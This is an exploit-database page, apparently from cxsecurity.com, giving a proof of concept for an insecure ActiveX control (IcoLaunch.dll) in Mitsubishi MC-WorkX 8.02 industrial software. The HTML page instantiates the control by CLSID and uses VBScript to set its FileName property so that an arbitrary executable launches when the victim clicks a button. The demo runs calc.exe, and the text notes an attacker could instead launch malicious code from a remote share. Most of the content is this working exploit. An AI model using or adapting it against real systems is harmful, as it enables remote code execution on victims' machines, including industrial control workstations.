Mitsubishi MC-WorkX Suite Insecure ActiveX Control IcoLaunch.dl

2013.09.15
Credit: Blake
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<html> <object classid='clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D' id='target'></object> <!-- Mitsubishi MC-WorkX Suite Insecure ActiveX Control - IcoLaunch.dll Vendor: http://www.meau.com Version: MC-WorkX 8.02 Tested on: Windows XP SP3 / IE 6 Download: http://www.meau.com/functions/dms/getfile.asp?ID=035000000000000001000000908800000 Author: Blake CLSID: C28A127E-4A85-11D3-A5FF-00A0249E352D ProgId: ICOLAUNCHLib.LaunchCtl Path: C:\Program Files\Mitsubishi Electric Automation\MC-WorX\Bin\IcoLaunch.dll MemberName: FileName Safe for scripting: True Safe for init: True Kill Bit: False --> <title>Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)</title> <p>This proof of concept will launch an arbritrary executable when the Login Client button is clicked. An attacker could use this to have the victim launch malicious code from a remote share. Calc is used in this example.</p> <script language='vbscript'> file="C:\\WINDOWS\\system32\\calc.exe" target.FileName = file </script>

References:

http://www.meau.com/functions/dms/getfile.asp?ID=035000000000000001000000908800000


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top